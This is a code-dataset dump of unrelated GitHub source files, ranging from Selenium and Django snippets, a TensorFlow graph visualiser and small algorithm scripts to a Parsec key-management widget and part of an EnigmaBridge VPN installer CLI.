page_actions.get_all_open_windows(driver)\n abc = driver.current_window_handle\n for win in windows:\n driver.switch_to.window(win)\n if str(driver.current_url) == str(configRead.locatorRead(\"Alerts_window_popup_modal\",\"Facebook_url\")):\n alerts_n_modals_Assersions.assert_facebook_title(driver)\n driver.switch_to.window(abc)\n driver.close()\n\n\n\n\n","repo_name":"aashishdalmiapython/Jenkin_SampleProject2","sub_path":"Pages/alert_n_modals_Page.py","file_name":"alert_n_modals_Page.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27128051514","text":"from django.urls import path\nfrom .views import capture_image, attendance, train_model, add_new, current_user, UserList , save_event, search\n\nurlpatterns = [\n path('current_user/', current_user),\n path('users/', UserList.as_view()),\n path('capture_image/', capture_image),\n path('attendance_record/',attendance),\n path('add_new/', add_new),\n path('train_model/',train_model),\n path('save_event/',save_event),\n path('search/',search),\n]","repo_name":"parva99/Face-Recognition-Attendance-Sysytem","sub_path":"authentication/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44346413230","text":"import pydot\nfrom itertools import chain\nimport tensorflow as tf\nimport numpy as np\n\ndef visualize(filepath = None, all_ops = None, multilocation_ops = []):\n dot = pydot.Dot()\n dot.set('rankdir', 'UD')\n dot.set('concentrate', True)\n dot.set_node_defaults(shape='record')\n if all_ops is None:\n all_ops = tf.get_default_graph().get_operations()\n\n # eval all const tensor in \"CPU\" session\n with tf.Session() as sess:\n const_values = {}\n const_tensors = [c_op.outputs[0] for c_op in all_ops if c_op.type == \"Const\"]\n values = sess.run(const_tensors)\n for t, v in zip(const_tensors, values):\n const_values[t.name] = v\n\n # variable is not an OP but OP may read from it\n for var in tf.global_variables():\n node = pydot.Node(name = var.name,\n label=\"variable\",\n tooltip= var.name,\n margin = '\"0,0\"', width = \"0\", height = \"0\", style = '\"filled\"',\n fillcolor = \"brown1\")\n dot.add_node(node)\n\n all_tensors = [k for k in set(chain(\n *[c_op.outputs for c_op in all_ops],\n *[c_op.inputs for c_op in all_ops],\n ))]\n simple_const_op = []\n for c_node in all_tensors:\n # variable/read is not in all_ops\n if c_node.op not in all_ops: all_ops.append(c_node.op)\n label = c_node.op.type\n tooltip = \"{}\".format(c_node.op)\n tooltip = tooltip.replace('\"',\"'\")\n color = \"cyan\"\n if c_node.name in const_values:\n val = const_values[c_node.name]\n cnt = np.prod(val.shape)\n is_int = np.issubdtype(val.dtype, np.integer)\n if (cnt <= 8 and is_int) or (cnt == 1):\n if is_int:\n label = '\"{}\"'.format(\",\".join([\"{}\".format(v) for v in val.flatten()]))\n else:\n label = '\"{}\"'.format(\",\".join([\"{:.2f}\".format(v) for v in val.flatten()]))\n tooltip = np.array_repr(val, 100)\n color = \"gray88\"\n simple_const_op.append(c_node.op.name)\n else:\n vstr = np.array_repr(val, 100, 3).split('\\n')\n if len(vstr) > 32:\n vstr = [*vstr[:30],\"...\\n\",vstr[-1]]\n tooltip = \"\\n\".join(vstr)\n \n shape = \"box\"\n if c_node.op.name in multilocation_ops:\n shape = \"cds\"\n color = \"cyan3\"\n \n node = pydot.Node(name = c_node.op.name,\n label=label,\n tooltip=tooltip,\n margin = '\"0,0\"', width = \"0\", height = \"0\", style = '\"filled,rounded\"',shape=shape,\n fillcolor = color)\n dot.add_node(node)\n\n multilocation_id = [0 for _ in multilocation_ops]\n for c_op in all_ops:\n for io, c_output in enumerate(c_op.outputs):\n for ii, c_input in enumerate(c_op.inputs):\n label = []\n if c_input.op.name in simple_const_op:\n pass\n else:\n if len(c_input.shape) > 0:\n label.append(\"{}\".format(c_input.shape))\n if c_input.dtype.name != \"float32\":\n label.append(\"{}\".format(c_input.dtype.name))\n src_name = c_input.op.name\n \n if src_name in multilocation_ops:\n k = multilocation_ops.index(src_name)\n src_id = multilocation_id[k]\n multilocation_id[k] += 1\n src_name = \"{}[{}]\".format(src_name, src_id)\n node = pydot.Node(name = src_name,\n label=c_input.op.type,\n tooltip=tooltip,\n margin = '\"0,0\"', width = \"0\", height = \"0\", style = '\"filled,rounded\"',\n shape = \"cds\",\n fillcolor = color)\n dot.add_node(node)\n \n dot.add_edge(pydot.Edge(\n src_name,\n c_output.op.name,\n label=\"\\n\".join(label),\n fontsize=\"10\",\n labeltooltip=\"\"))\n dot_src = dot.create(\"dot\", \"svg\", encoding=\"utf-8\")\n if isinstance(dot_src, bytes):\n dot_src = dot_src.decode('utf-8')\n import dot_svg_html\n dot_svg_html.dot_to_html(dot_src, filepath)\n return dot\n","repo_name":"usstq/NN-runtimes","sub_path":"OpenVINO/tfgraph_viewer.py","file_name":"tfgraph_viewer.py","file_ext":"py","file_size_in_byte":4576,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"40360882437","text":"import openpyxl\r\n\r\n#creating a Workbook object\r\nwb=openpyxl.Workbook()\r\n\r\n'''\r\nwb.active\r\n'''\r\n\r\n#creating sheet\r\nws1 = wb.create_sheet(\"Mysheet\",0)\r\n\r\n'''\r\nprint(wb.sheetnames)\r\n'''\r\n#Addind value in row column value format\r\nfor i in range(1,101):\r\n\tfor j in range(1,101):\r\n\t\tws1.cell(row=i, column=j,value=i)\r\n\r\n#Adding data in range format\r\nws1[\"A1\"]=\"khankir chele\"\t\t\r\n\r\n#saving a workbook\r\nwb.save('balances.xlsx')\r\n\r\n","repo_name":"pogo420/Python_Basics","sub_path":"old_code/excel001.py","file_name":"excel001.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9308318672","text":"\ndef algorithm_nearest(curr_ts, prev_ts, prev_msg, next_ts, next_msg):\n if curr_ts - prev_ts <= next_ts - curr_ts:\n return prev_msg\n else:\n return next_msg\n\n\ndef always_return_something(f):\n def wrapper(curr_ts, prev_ts, prev_msg, next_ts, next_msg):\n if prev_ts is None:\n return next_msg\n if next_ts is None:\n return prev_msg\n return f(curr_ts, prev_ts, prev_msg, next_ts, next_msg)\n return wrapper\n\n\nALGORITHMS = {\n 'previous': lambda ct, pt, pm, nt, nm: pm,\n 'next': lambda ct, pt, pm, nt, nm: nm,\n 'nearest': always_return_something(algorithm_nearest),\n 'exact': lambda ct, pt, pm, nt, nm: None,\n}\n\n\ndef align(target_iterator, *other_iterators, **options):\n # prepare parameters\n default_alg = options.get('algorithm', 'nearest')\n other_iterators = [\n it if isinstance(it, tuple) else (it, default_alg)\n for it in other_iterators\n ]\n\n # prepare last_infos\n last_infos = []\n for it, alg in other_iterators:\n msg = next(it, None)\n ts = msg[0] if msg is not None else None\n last_infos.append((ts, msg, None, None))\n\n # main iterator\n for target_msg in target_iterator:\n target_ts = target_msg[0]\n res = [target_msg]\n\n for idx, (it, alg) in enumerate(other_iterators):\n # make sure last_two_ts <= target_ts <= last_one_ts unless one is None\n last_one_ts, last_one_msg, last_two_ts, last_two_msg = last_infos[idx]\n\n while last_one_ts and last_one_ts < target_ts:\n last_two_ts, last_two_msg = last_one_ts, last_one_msg\n last_one_msg = next(it, None)\n last_one_ts = last_one_msg[0] if last_one_msg is not None else None\n last_infos[idx] = (last_one_ts, last_one_msg,\n last_two_ts, last_two_msg)\n\n # exactly the same! this is the eager case for 'previous' algorithm\n if last_one_ts == target_ts:\n res.append(last_one_msg)\n\n # use the algorithm\n else:\n assert (last_two_ts or 0) < target_ts < (last_one_ts or 1e99)\n res.append(ALGORITHMS[alg](target_ts, last_two_ts,\n last_two_msg, last_one_ts,\n last_one_msg))\n yield res\n","repo_name":"Jyb-mouse/cam2imu","sub_path":"aligner.py","file_name":"aligner.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"728348408","text":"from sqlalchemy import Column, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\n\nBase = declarative_base()\n\n \nclass User(Base):\n __tablename__ = 'users'\n id = Column(Integer, primary_key=True)\n username = Column(String(50), unique=True, nullable=False)\n email = Column(String(120), unique=True, nullable=False)\n password = Column(String(128), nullable=False)\n name = Column(String)\n age = Column(Integer)\n gender = Column(String)\n \n def to_dict(self):\n return {c.name: getattr(self, c.name) for c in self.__table__.columns}\n \nclass Record(Base):\n __tablename__ = 'records'\n index = Column(Integer,primary_key=True)\n relative_path = Column(String)\n output = Column(Integer)\n emotion = Column(String)\n user_id = Column(Integer)\n \n def to_dict(self):\n return {c.name: getattr(self, c.name) for c in self.__table__.columns}\n \n\n","repo_name":"dunkdink/thaiser-backend","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20352078644","text":"import sys\n\ninput = sys.stdin.readline\n\nif __name__ == '__main__':\n pairDic = {}\n for i in range(1, 13):\n for j in range(i + 1, 13):\n sum = i + j\n if sum in pairDic:\n pairDic[sum].append((i, j))\n else:\n pairDic[sum] = [(i, j)]\n n = int(input())\n for _ in range(n):\n want = int(input())\n output = []\n print(f'Pairs for {want}: ', end='')\n if want in pairDic:\n for item in pairDic.get(want):\n output.append(f'{item[0]} {item[1]}')\n print(', '.join(output))\n","repo_name":"Alphanewbie/TIL","sub_path":"Algorithm_problem_solving/Baek-joon/5217/5217.py","file_name":"5217.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41624353804","text":"import re\n\ndef validar_respuesta(patron_re : str, texto : str )-> str | int:\n '''\n valida si un texto conincide con el patron\n Recibe: un texto a evaluar y un patron regex\n devuelve un int\n '''\n if(texto):\n if(re.match(patron_re, texto)):\n return texto\n return -1\n else:\n return -1\n \ncadena = \"5555\"\n\nrespuesta_de_ordenamiento = validar_respuesta(r\"^a[s]c$|^d[e][s]c$\", cadena)\nprint(respuesta_de_ordenamiento)\n","repo_name":"HoracioxBarrios/programacion_1_python","sub_path":"D_SIMULACRO_PARCIAL_clase10/capturas_e_info/validar_asc_des.py","file_name":"validar_asc_des.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27966688606","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n# for _ in range(one()):\n# a,b,c=wow()\n# print(min(a,b,c))\n\n# import math\n# for index in range(1,one()+1):\n# r,x,y = wow()\n# cnt = 0\n# for _ in range(r):\n# d,price = wow()\n# answer = math.ceil(d/x)\n# if answer <=y:\n# cnt+=price\n# if index != 1:\n# print()\n# print(f\"Data Set {index}:\")\n# print(cnt)\n\n# l = one()\n# a = inputing()\n# b = inputing()\n# cnt = 0\n# for x,y in zip(a,b):\n# if x != y:\n# cnt+=1\n# print(cnt)\n\n\n\n \n\n\n\n\n","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2022/9월/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24105879450","text":"from django import forms\nfrom .models import Tag \n\nclass TodoForm(forms.Form):\n text = forms.CharField(max_length=40, \n widget=forms.TextInput(\n attrs = {\n 'class' : 'form-control',\n 'placeholder' : 'I\\'ll do This today ',\n 'aria-label' : 'Todo',\n 'aria-describedby' : 'add-btn'\n }))\n tags = forms.ModelMultipleChoiceField(queryset=Tag.objects.all(), required=False)","repo_name":"gutalavijay1111/ToDo-App","sub_path":"todo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73809860329","text":"import shutil\nimport os\nfrom pathlib import Path\n\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QFileDialog\n\nfrom parsec.core.local_device import (\n list_available_devices,\n AvailableDevice,\n load_device_file,\n get_devices_dir,\n)\n\nfrom parsec.core.gui.ui.keys_widget import Ui_KeysWidget\nfrom parsec.core.gui.ui.key_widget import Ui_KeyWidget\nfrom parsec.core.gui.custom_dialogs import show_error, ask_question\nfrom parsec.core.gui.lang import translate\n\n\nclass KeyWidget(QWidget, Ui_KeyWidget):\n export_clicked = pyqtSignal(AvailableDevice)\n\n def __init__(self, device, parent=None):\n super().__init__(parent=parent)\n self.device = device\n self.setupUi(self)\n self.label_org.setText(device.organization_id)\n self.label_device.setText(device.device_label)\n self.label_user.setText(device.human_handle.label)\n self.export_button.clicked.connect(self._on_export)\n\n def _on_export(self):\n self.export_clicked.emit(self.device)\n\n\nclass KeysWidget(QWidget, Ui_KeysWidget):\n key_imported = pyqtSignal()\n\n def __init__(self, config, parent):\n super().__init__(parent=parent)\n self.config = config\n self.setupUi(self)\n self.reload_devices()\n self.button_import_key.clicked.connect(self._on_import_key)\n\n def reload_devices(self):\n layout = self.scroll_content.layout()\n for _ in range(layout.count()):\n item = self.scroll_content.layout().takeAt(0)\n layout.removeItem(item)\n w = item.widget()\n if w is not None:\n w.setParent(None)\n devices = list_available_devices(self.config.config_dir)\n for device in devices:\n w = KeyWidget(device, parent=self)\n w.export_clicked.connect(self._on_export_key)\n self.scroll_content.layout().insertWidget(self.scroll_content.layout().count() - 1, w)\n\n def _overwrite_key(self, dest):\n if dest.exists():\n rep = ask_question(\n parent=self,\n title=translate(\"ASK_OVERWRITE_KEY\"),\n message=translate(\"TEXT_OVERWRITE_KEY\"),\n button_texts=(translate(\"ACTION_OVERWRITE_KEY_YES\"), translate(\"ACTION_IMPORT_NO\")),\n )\n return rep == translate(\"ACTION_OVERWRITE_KEY_YES\")\n return True\n\n def _on_export_key(self, device):\n default_key_name = f\"parsec-{device.organization_id}-{device.human_handle.label}-{device.device_label}.keys\"\n key_path, _ = QFileDialog.getSaveFileName(\n self,\n translate(\"TEXT_EXPORT_KEY\"),\n str(Path.home().joinpath(default_key_name)),\n filter=translate(\"IMPORT_KEY_FILTERS\"),\n initialFilter=translate(\"IMPORT_KEY_INITIAL_FILTER\"),\n )\n if not key_path:\n return\n keys_dest = Path(key_path)\n try:\n shutil.copyfile(device.key_file_path, keys_dest)\n except IOError as err:\n show_error(self, translate(\"EXPORT_KEY_ERROR\"), err)\n\n def _on_import_key(self):\n key_file, _ = QFileDialog.getOpenFileName(\n parent=self,\n caption=translate(\"ACTION_IMPORT_KEY\"),\n filter=translate(\"IMPORT_KEY_FILTERS\"),\n initialFilter=translate(\"IMPORT_KEY_INITIAL_FILTER\"),\n )\n if not key_file:\n return\n new_device = load_device_file(Path(key_file))\n if new_device is None:\n show_error(self, translate(\"TEXT_INVALID_DEVICE_KEY\"))\n return\n rep = ask_question(\n parent=self,\n title=translate(\"ASK_IMPORT_KEY\"),\n message=translate(\"TEXT_IMPORT_KEY_CONFIRM_organization-user-device\").format(\n organization=new_device.organization_id,\n user=new_device.short_user_display,\n device=new_device.device_label,\n ),\n button_texts=(translate(\"ACTION_IMPORT_YES\"), translate(\"ACTION_IMPORT_NO\")),\n )\n if rep == translate(\"ACTION_IMPORT_YES\"):\n key_name = new_device.slughash + \".keys\"\n dest = get_devices_dir(self.config.config_dir).joinpath(key_name)\n if self._overwrite_key(dest):\n\n shutil.copyfile(\n new_device.key_file_path,\n os.path.join(get_devices_dir(self.config.config_dir), key_name),\n )\n self.reload_devices()\n self.key_imported.emit()\n","repo_name":"groumage/Parsec-TowardAMoreSecureCloud","sub_path":"parsec/core/gui/keys_widget.py","file_name":"keys_widget.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8516371855","text":"a1 = int(input()) # in [65… 89]\na2 = int(input()) # in [66… 91]\nn = int(input()) # in [1… 10]\n\nfor symbol_1 in range(a1, a2):\n if symbol_1 % 2 == 0:\n continue\n for symbol_2 in range(1, n):\n for symbol_3 in range(1, n // 2):\n if (symbol_1 + symbol_2 + symbol_3) % 2 != 0:\n print(f\"{chr(symbol_1)}-{symbol_2}{symbol_3}{symbol_1}\")\n","repo_name":"SimeonChifligarov/SoftUni_as_Lecturer","sub_path":"Python_Courses/Python_Basics/Preparation_PB_Exams/03_PB_Exam_15_16_June_2019/06_Movie_Tickets.py","file_name":"06_Movie_Tickets.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71655213287","text":"from scipy import signal\n\n# Absolute path of .current script\n#script_pos = os.path.dirname(os.path.abspath(__file__))\n\ndef get_index_band(rate,lower,upper):\n lower_index=int(lower*rate)\n upper_index=int(lower*rate)\n return[lower_index,upper_index]\n\n\ndef get_power_spectrum(X,y,channel,fs=250):\n #X=data.X\n #X=data.X[0][0,:]\n #data.X.shape=>(751, 19, 5000)\n #data.X[0][0,:].shape\n total_sample_number=X.shape[0]\n points_per_signal=X.shape[2]\n sample_holder=np.empty((1,1), dtype=float)\n for sample_number in range(0,total_sample_number):\n data_channel_holder=np.empty((1), dtype=float)\n for each_channel in range(0,channel):\n each_signal=X[sample_number,each_channel,:]\n f, Pxx_den = signal.periodogram(each_signal, fs,scaling=\"spectrum\")\n rate_equi=(points_per_signal/fs)\n #delta power 0-4Hz\n indexs=get_index_band(rate_equi,0,4)\n delta_power=Pxx_den[indexs[0]:indexs[1]]\n #theta power 4-7hz\n indexs=get_index_band(rate_equi,4,8)\n theta_power=Pxx_den[indexs[0]:indexs[1]]\n #Alpha power 8-15hz\n indexs=get_index_band(rate_equi,8,16)\n alpha_power=Pxx_den[indexs[0]:indexs[1]]\n #beta power 16-31hz\n indexs=get_index_band(rate_equi,16,32)\n beta_power=Pxx_den[indexs[0]:indexs[1]]\n #gamma power 16-31hz\n #indexs=get_index_band(rate_equi,32,32)\n #gamma_power=Pxx_den[indexs[0]:indexs[1]]\n data_channel_holder=np.hstack([data_channel_holder,delta_power,theta_power,alpha_power,beta_power])\n sample_holder=np.vstack([sample_holder,data_channel_holder])\n return sample_holder","repo_name":"gariciodaro/eeg_master","sub_path":"Auxiliar/CommonHelper.py","file_name":"CommonHelper.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29965503864","text":"class Node:\n def __init__(self):\n self.n = 0\n self.e = ''\n\nclass Queue:\n def __init__(self):\n self.first = 0\n \n def add(self, newElement):\n newNode = Node()\n newNode.e = newElement\n if self.first != 0:\n newNode.n = self.first\n self.first = newNode\n \n def remove(self):\n nodeToBeRemoved = self.first\n self.first = nodeToBeRemoved.n\n return nodeToBeRemoved.e\n \n def isNotEmpty(self):\n return self.first != 0\n\n def getSmaller(self):\n if self.first.n == 0:\n actualNode = 0\n else:\n actualNode = self.first.n\n\n smallerElement = self.first.e\n\n while actualNode != 0:\n if smallerElement > actualNode.e:\n smallerElement = actualNode.e\n actualNode = actualNode.n\n return smallerElement\n\nq = Queue()\nq.add(\"C\")\nq.add(\"A\")\nq.add(\"B\")\nprint(q.isNotEmpty())\nprint(q.getSmaller())","repo_name":"Charlietzu/programming-languages","sub_path":"lista05/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9117928482","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass\nfrom typing import Dict, List, Union\n\n\n@dataclass\nclass Term:\n text: str\n classes: str\n is_regex: bool\n flags: str\n\n\nTermsDict = Dict[str, List[Union[str, dict]]]\n\n\ndef terms_dict_to_list(terms_dict: TermsDict) -> list[Term]:\n \"\"\"Collect terms from the config's `terms` dict into a list\"\"\"\n terms: list[Term] = []\n for classes, term_list in terms_dict.items():\n for term_obj in term_list:\n if isinstance(term_obj, str):\n terms.append(Term(term_obj, classes, False, \"\"))\n else:\n terms.append(\n Term(\n term_obj[\"pattern\"],\n classes,\n True,\n term_obj.get(\"flags\", \"\"),\n )\n )\n return terms\n\n\ndef normalize_classes(classes: str) -> str:\n return \" \".join(sorted(klass.lower() for klass in classes.split()))\n\n\ndef terms_list_to_dict(terms: list[Term]) -> TermsDict:\n terms_dict: TermsDict = {}\n for term in terms:\n classes = normalize_classes(term.classes)\n terms_dict.setdefault(classes, [])\n if term.is_regex:\n terms_dict[classes].append({\"pattern\": term.text, \"flags\": term.flags})\n else:\n terms_dict[classes].append(term.text)\n return terms_dict\n","repo_name":"abdnh/anki-editor-highlighter","sub_path":"src/terms.py","file_name":"terms.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32687560490","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\nimport time\nimport traceback\n\nimport coloredlogs\n\nfrom ebstall.deployers import dnsmasq\nfrom ebstall.deployers import nginx\nfrom ebstall.deployers import openvpn\nfrom ebstall.deployers import php\nfrom ebstall.deployers import supervisord\nfrom ebstall.deployers import vpnauth\nfrom ebstall.deployers import pspace_web\nfrom ebstall.deployers import nextcloud\nfrom ebstall.deployers import ejabberd\n\nimport errors\nimport util\nfrom cli import Installer\nfrom core import Core\n\nlogger = logging.getLogger(__name__)\ncoloredlogs.install(level=logging.ERROR)\n\n\nclass VpnInstaller(Installer):\n \"\"\"\n Extended installer - with VPN.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Init core\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n Installer.__init__(self, *args, **kwargs)\n self.full_reinstall = True\n\n self.ovpn = None\n self.dnsmasq = None\n self.nginx = None\n self.supervisord = None\n self.vpnauth = None\n self.php = None\n self.pspace_web = None\n self.nextcloud = None\n self.ejabberd = None\n\n self.vpn_keys = None, None, None\n self.vpn_crl = None\n self.vpn_client_config = None\n\n def init_argparse(self):\n \"\"\"\n Adding new VPN related arguments\n :return:\n \"\"\"\n parser = Installer.init_argparse(self)\n return parser\n\n def is_email_required(self):\n \"\"\"\n Returns true if the given scenario requires user email\n :return:\n \"\"\"\n return True\n\n def ask_for_email_reason(self, is_required=None):\n \"\"\"\n Reason why we need email - required in VPN case.\n :param is_required:\n :return:\n \"\"\"\n self.tprint('We need your email address for:\\n'\n ' a) identity verification for EnigmaBridge account \\n'\n ' b) LetsEncrypt certificate registration\\n'\n ' c) PKI setup - VPN configuration')\n self.tprint('We will send you a verification email.')\n self.tprint('Without a valid e-mail address you won\\'t be able to continue with the installation\\n')\n\n def init_install_intro_text(self):\n \"\"\"\n Shows installation intro text when installation starts.\n :return:\n \"\"\"\n self.tprint('Going to install Private Space backed by Enigma Bridge FIPS140-2 encryption service.\\n')\n\n def get_args_intro(self, parser):\n \"\"\"\n Argument parser intro text\n :return:\n \"\"\"\n parser.description = 'EnigmaBridge Private Space installer'\n\n def update_intro(self):\n \"\"\"\n Updates intro text for CLI header - adds version to it.\n :return:\n \"\"\"\n self.intro = '-'*self.get_term_width() + \\\n ('\\n Enigma Bridge Installer command line interface (v%s) \\n' % self.version) + \\\n '\\n usage - shows simple command list' + \\\n '\\n init - initializes the Private Space\\n'\n\n if self.first_run:\n self.intro += ' run this when running for the first time\\n'\n\n self.intro += '\\n More info: https://enigmabridge.com/amazonpki \\n' + \\\n '-'*self.get_term_width()\n\n def do_test_vpn_ports(self, line):\n \"\"\"Tests if VPN server ports are accessible\"\"\"\n public_ip = self.cfg_get_raw_ip()\n port = 1194\n tcp = False\n\n self.tprint('Testing IP: %s, ports %s' % (public_ip, port))\n res_value = util.test_port_routable(host=public_ip, port=port, tcp=tcp, with_server=True)\n if res_value is None:\n self.tprint('Server seems to be running, UDP scan cannot be performed')\n return\n\n self.tprint('Port %s, echo server, reachable: %s' % (port, res_value))\n\n def do_update_ejbca_install(self, line):\n \"\"\"Updates EJBCA distribution from the provisioning server\"\"\"\n self.load_base_settings()\n self.init_load_settings()\n self.init_services()\n self.ejbca.update_installation()\n\n def init_test_ports_pre_install_res(self, host=None, *args, **kwargs):\n failed_ports = Installer.init_test_ports_pre_install_res(self, host, *args, **kwargs)\n\n vpn_ok = util.test_port_routable(host=host, port=openvpn.OpenVpn.PORT_NUM, tcp=openvpn.OpenVpn.PORT_TCP,\n with_server=True, audit=self.audit)\n if not vpn_ok:\n failed_ports.append(util.Port(port=openvpn.OpenVpn.PORT_NUM, tcp=openvpn.OpenVpn.PORT_TCP,\n service='OpenVPN'))\n return failed_ports\n\n def init_print_intro(self):\n \"\"\"\n Prints introduction text before the installation.\n :return:\n \"\"\"\n self.tprint('')\n self.cli_separator()\n self.tprint('\\nThe installation is about to start.')\n self.tprint('During the installation we collect the following ec2 metadata for enrolment to '\n 'Enigma Bridge CloudHSM: ')\n self.tprint(' - ami-id')\n self.tprint(' - instance-id (anonymized, HMAC)')\n self.tprint(' - instance-type')\n self.tprint(' - placement (AWS region)')\n self.tprint(' - local-ipv4')\n self.tprint(' - public-ipv4')\n self.tprint(' - public-hostname')\n self.tprint('')\n self.tprint(self.wrap_term(single_string=True, max_width=80,\n text='We will send the data above with your e-mail address (if entered) '\n 'to our EnigmaBridge registration server during this initialization. '\n 'We will use it to:'))\n self.tprint(' - generate a dynamic DNS name (e.g., cambridge1.umph.io);')\n self.tprint(' - create a client account at the Enigma Bridge CloudHSM service.')\n self.tprint('')\n self.tprint(self.wrap_term(single_string=True, max_width=80,\n text='The Enigma Bridge account allows you access to secure hardware, which is used '\n 'to generate new RSA keys and use them securely to sign certificates, CRLs, '\n 'and OCSP responses.'))\n self.tprint('')\n text = 'The static DNS name allows you securely access the PKI web interface as ' \\\n 'it will have a valid browser-trusted HTTPS certificate as soon as this ' \\\n 'initialization is completed. No more manual over-ride of untrusted ' \\\n 'certificates and security exceptions in your browser. ' \\\n 'We need to communicate with a public certification authority LetsEncrypt. ' \\\n 'LetsEncrypt will verify a certificate request is genuine either by connecting ' \\\n 'to port 443 on this instance or by a DNS challenge on the domain ' \\\n 'if 443 is blocked.'\n\n self.tprint(self.wrap_term(single_string=True, max_width=80, text=text))\n self.tprint('')\n self.tprint(self.wrap_term(single_string=True, max_width=80,\n text='More details and our privacy policy can be found at: '\n 'https://enigmabridge.com/amazonpki'))\n self.tprint('')\n self.tprint('Please make sure the following ports are reachable: ')\n self.tprint(' tcp: 443, 8442, 8443, udp: 1194')\n\n self.tprint('')\n text = 'In order to continue with the installation we need your consent with the network ' \\\n 'communication the instance will be doing during the installation as outlined in' \\\n 'the description above'\n self.tprint(self.wrap_term(single_string=True, max_width=80,text=text))\n\n self.tprint('')\n\n def init_show_p12_info(self, new_p12, new_config=None):\n \"\"\"\n Informs user where to get P12 file to log into EJBCA admin panel.\n :return:\n \"\"\"\n if new_p12 is None:\n raise ValueError('P12 file is not defined')\n\n if new_config is None:\n new_config = self.config\n\n self.tprint('')\n self.tprint(self.t.underline('Please setup your computer to manage users of your Private Space'))\n time.sleep(0.5)\n\n public_hostname = self.ejbca.hostname if self.domain_is_ok else self.cfg_get_raw_hostname()\n self.tprint('\\nDownload your administration key: %s' % new_p12)\n self.tprint(' scp -i ec2-user@%s:%s .' % (public_hostname, new_p12))\n self.tprint_sensitive(' Password protecting the key is: %s' % self.ejbca.superadmin_pass)\n self.tprint('\\nPlease use the following page for a detailed guide how to import the key file '\n '(aka, P12 file): https://enigmabridge.com/support/aws13076')\n self.tprint('\\nOnce you download the key file AND import it to your computer browser/keychain you can '\n 'connect to the PKI/VPN admin interface:')\n\n if self.domain_is_ok:\n for domain in new_config.domains:\n self.tprint(' https://%s:%d' % (domain, self.ejbca.PORT_PUBLIC))\n else:\n self.tprint(' https://%s:%d' % (self.cfg_get_raw_hostname(), self.ejbca.PORT_PUBLIC))\n\n self.tprint('')\n txt = self.t.green('IMPORTANT') +\\\n ': We recommend using the \"Private Space\" to download your administrator key and an ' \\\n 'email with instructions will be delivered instantly (please check your spam/junk folder if' \\\n ' you can\\'t find it). Using instructions above increases flexibility for management ' \\\n 'but it also assumes expert knowledge and ability to foresee impact of your actions.'\n\n self.tprint(self.wrap_term(single_string=True, max_width=80, text=txt))\n\n self.tprint('\\n\\nPlease contact us at support@enigmabridge.com or '\n 'https://enigmabridge.freshdesk.com/helpdesk/tickets/new if you need assistance.')\n\n def init_services(self):\n \"\"\"\n Services initialization - instantiates basic services\n :return: \n \"\"\"\n Installer.init_services(self)\n\n self.ovpn = openvpn.OpenVpn(sysconfig=self.syscfg, audit=self.audit, write_dots=True)\n self.dnsmasq = dnsmasq.DnsMasq(sysconfig=self.syscfg, audit=self.audit, write_dots=True)\n self.nginx = nginx.Nginx(sysconfig=self.syscfg, audit=self.audit, write_dots=True)\n self.supervisord = supervisord.Supervisord(sysconfig=self.syscfg, audit=self.audit, write_dots=True)\n self.vpnauth = vpnauth.VpnAuth(sysconfig=self.syscfg, audit=self.audit, write_dots=True,\n supervisord=self.supervisord, mysql=self.mysql, ovpn=self.ovpn)\n self.php = php.Php(sysconfig=self.syscfg, audit=self.audit, write_dots=True)\n self.pspace_web = pspace_web.PrivSpaceWeb(sysconfig=self.syscfg, audit=self.audit, write_dots=True,\n mysql=self.mysql, nginx=self.nginx, config=self.config)\n self.nextcloud = nextcloud.NextCloud(sysconfig=self.syscfg, audit=self.audit, write_dots=True,\n mysql=self.mysql, nginx=self.nginx, config=self.config)\n self.ejabberd = ejabberd.Ejabberd(sysconfig=self.syscfg, audit=self.audit, 